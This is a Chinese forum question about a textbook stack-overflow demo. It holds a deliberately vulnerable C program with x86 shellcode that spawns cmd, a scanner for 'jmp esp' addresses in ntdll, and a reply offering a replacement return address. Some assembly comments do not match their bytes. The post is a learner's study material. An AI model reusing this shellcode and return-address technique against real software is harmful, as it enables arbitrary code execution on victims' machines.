这本书里有这样一段代码:
#include <stdio.h>
#include <string.h>

/*
 * Deliberately vulnerable demo program, quoted from the book as given in the post.
 *
 * `name` is far longer than the 8-byte `output` buffer that main() copies it
 * into with an unbounded strcpy(), so the copy runs past the end of `output`
 * and over the rest of main's stack frame (the //output[8] and //ebp markers
 * below show where the author expects each part of the string to land).
 * The remaining bytes are raw 32-bit x86 machine code and hard-coded
 * addresses taken from one specific Windows build, which is why the program
 * is tied to the system it was written on and does not behave the same way
 * elsewhere.
 *
 * The defect being demonstrated is the unbounded copy itself: a bounded
 * write (e.g. snprintf(output, sizeof output, "%s", name)) would stop at
 * the end of `output` and make the rest of this string irrelevant.
 */
char name[] = "\x41\x41\x41\x41"
"\x41\x41\x41\x41" //output[8]
"\x41\x41\x41\x41" //ebp
"\x1c\x80\xf5\x77"//0x77f5801c: for where this address comes from, see the jmp esp lookup code below
"\x55" //push ebp
"\x8B\xEC" //mov ebp, esp
"\x33\xC0" //xor eax, eax
"\x50" //push eax
"\x50" //push eax
"\x50" //push eax
"\xC6\x45\xF5\x6D" //mov byte ptr[ebp-0Bh], 6Dh
"\xC6\x45\xF6\x73" //mov byte ptr[ebp-0Ah], 73h
"\xC6\x45\xF7\x76" //mov byte ptr[ebp-09h], 76h
"\xC6\x45\xF8\x63" //mov byte ptr[ebp-08h], 63h
"\xC6\x45\xF9\x72" //mov byte ptr[ebp-07h], 72h
"\xC6\x45\xFA\x74" //mov byte ptr[ebp-06h], 74h
"\xC6\x45\xFB\x2E" //mov byte ptr[ebp-05h], 2Eh
"\xC6\x45\xFC\x64" //mov byte ptr[ebp-04h], 64h
"\xC6\x45\xFD\x6C" //mov byte ptr[ebp-03h], 6Ch
"\xC6\x45\xFE\x6C" //mov byte ptr[ebp-02h], 6Ch
"\x8D\x45\xF5" //lea eax, [ebp-0Bh]
"\x50" //push eax
"\xBA\x7B\x1D\x80\x7C" //mov edx, 0x7C801D7Bh
"\xFF\xD2" //call edx
"\x83\xC4\x0C" //add esp, 0Ch
"\x8B\xEC" //mov ebp, esp
"\x33\xC0" //xor eax, eax
"\x50" //push eax
"\x50" //push eax
"\x50" //push eax
"\xC6\x45\xFC\x63" //mov byte ptr[ebp-04h], 63h
"\xC6\x45\xFD\x6D" //mov byte ptr[ebp-03h], 6Dh
"\xC6\x45\xFE\x64" //mov byte ptr[ebp-02h], 64h
"\x8D\x45\xFC" //lea eax, [ebp-04h]
"\x50" //push eax
"\xB8\xC7\x93\xBF\x77" //mov edx, 0x77BF93C7h
"\xFF\xD0" //call edx
"\x83\xC4\x10" //add esp, 10h
"\x5D" //pop ebp
"\x6A\x00" //push 0
"\xB8\xc7\x93\xbf\x77" //mov eax, 0x7c81cb12
"\xFF\xD0";

/* Loop counter kept at file scope (not a local of main()). */
int i;

/*
 * NOTE(review): `void main()` is non-standard; ISO C requires `int main(void)`.
 * Copies `name` into an 8-byte buffer without a bound (the overflow described
 * above), then prints the first up-to-8 bytes of `output`, stopping early at
 * a NUL byte.
 */
void main()
{
    char output[8];
    strcpy(output, name);   /* unbounded copy: source is much longer than 8 bytes */
    for(i=0;i<8&&output[i];i++)
    {
        /* The format prints a literal backslash followed by "0x" and the byte.
         * `output[i]` is a plain char promoted to int, so on a platform where
         * char is signed any byte >= 0x80 prints sign-extended (e.g. 0xffffff80);
         * cast to unsigned char to print the raw byte value. */
        printf("\\0x%x",output[i]);
    }
}
这里的shellcode是启动一个cmd
偶用以下一段代码获取jmp esp的地址:
#include<windows.h>
#include<iostream.h>   // pre-standard header; standard C++ uses <iostream> and std::cout
#include<tchar.h>

/*
 * Helper the post used to obtain the 0x77f5801c value in the listing above.
 *
 * Walks forward from the base address of the loaded ntdll image and prints
 * every offset at which the two-byte sequence FF E4 (the encoding of
 * `jmp esp`) appears.  The addresses printed are specific to the DLL build
 * and load address of the machine this runs on, so they are not portable to
 * another system (which is the point the reply below makes).
 *
 * Returns 0 on success, 1 if ntdll could not be loaded.
 */
int main()
{
    int nRetCode=0;
    bool we_load_it=false;   // set if we had to LoadLibrary() ourselves, so we FreeLibrary() at the end
    HINSTANCE h;
    TCHAR dllname[]=_T("ntdll");
    h=GetModuleHandle(dllname);
    if(h==NULL)
    {
        h=LoadLibrary(dllname);
        if(h==NULL)
        {
            cout<<"ERROR LOADING DLL:"<<dllname<<endl;
            return 1;
        }
        we_load_it=true;
    }
    BYTE* ptr=(BYTE*)h;   // module handle doubles as the image base address
    bool done=false;
    // The loop has no upper bound on y: it keeps reading until an access past
    // the mapped image faults and is caught below.
    for(int y=0;!done;y++)
    {
        try
        {
            if(ptr[y]==0xFF&&ptr[y+1]==0xE4)
            {
                // NOTE(review): pointer narrowed to int; only meaningful in a 32-bit process
                int pos=(int)ptr+y;
                cout<<"OPCODE found at 0x"<<hex<<pos<<endl;
            }
        }
        catch(...)
        {
            // NOTE(review): relying on catch(...) to stop the scan assumes the
            // compiler turns the access violation into a C++ exception
            // (MSVC-specific behaviour) — confirm for the toolchain in use.
            cout<<"END OF"<<dllname<<"MEMORY REACHED"<<endl;
            done=true;
        }
    }
    if(we_load_it) FreeLibrary(h);
    return nRetCode;
}
输出:
OPCODE found at 0x77f5801c
OPCODE found at 0x77f77343
END OFntdllMEMORY REACHED
Press any key to continue
偶在运行第一段代码时，
没有成功启动cmd，请大虾们解答，小弟将十分感谢。
------解决方案--------------------
不知你用的什么系统……出现这种问题几乎都是JMP ESP和系统不符
你将"\x1c\x80\xf5\x77"改成下面我写的这个试试
"\x12\x45\xfa\x7f"